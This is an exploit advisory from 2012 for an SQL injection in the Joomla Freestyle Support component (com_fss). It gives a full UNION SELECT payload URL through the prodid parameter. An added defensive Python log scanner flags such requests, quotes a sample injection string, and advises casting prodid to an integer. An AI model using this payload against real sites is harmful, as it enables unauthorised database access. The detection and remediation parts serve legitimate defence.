Exploit Title: Joomla Freestyle Support com_fss sqli
Dork: N/A
Date: [17-10-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://freestyle-joomla.com
Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
License: Commercial
Download: http://freestyle-joomla.com/fssdownloads
Tested on: [Linux(bt5)-Windows(7ultimate)]
Special greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt

Joomla component description:
Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.
Warning: Invalid argument supplied for foreach() in
Exploit:
SQL : SQL injection
http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
_____________________________________________________
Daniel Barragan "D4NB4R" 2012
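
For defenders reviewing web server logs for requests like the one shown under "Exploit", this added example (not part of the original advisory) flags com_fss requests whose prodid parameter is not a plain integer. It assumes combined-format access logs and that legitimate prodid values are integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate prodid is a plain integer product id.
NUMERIC_RE = re.compile(r"\d+")

def suspicious_prodid(target):
    """Return decoded prodid values of a com_fss request that are not plain integers."""
    query = parse_qs(urlsplit(target).query)  # decodes %xx and '+' once
    if "com_fss" not in query.get("option", []):
        return []
    bad = []
    for key, values in query.items():
        # Covers prodid, repeated prodid and array-style prodid[] parameters.
        if key == "prodid" or key.startswith("prodid["):
            bad.extend(v for v in values if not NUMERIC_RE.fullmatch(v))
    return bad

def scan(lines):
    """Yield (line_number, client_ip, offending_values) for flagged log lines."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_prodid(match.group(1))
        if bad:
            yield number, line.split(" ", 1)[0], bad

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2012:10:00:01 +0000] "GET /index.php?option=com_fss&view=test&prodid=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [17/Oct/2012:10:00:05 +0000] "GET /index.php?option=com_fss&view=test&prodid=7.7%27+union+all+select+1%2Cversion()--+x HTTP/1.1" 200 4801',
    '192.0.2.10 - - [17/Oct/2012:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for number, ip, values in scan(SAMPLE_LOG):
        print(f"line {number}: {ip} sent non-numeric prodid {values!r}")
```

The same integer-only rule applied server-side, by casting prodid to an integer before it reaches the query, is what removes the injection point; the log scan only shows who has been probing it.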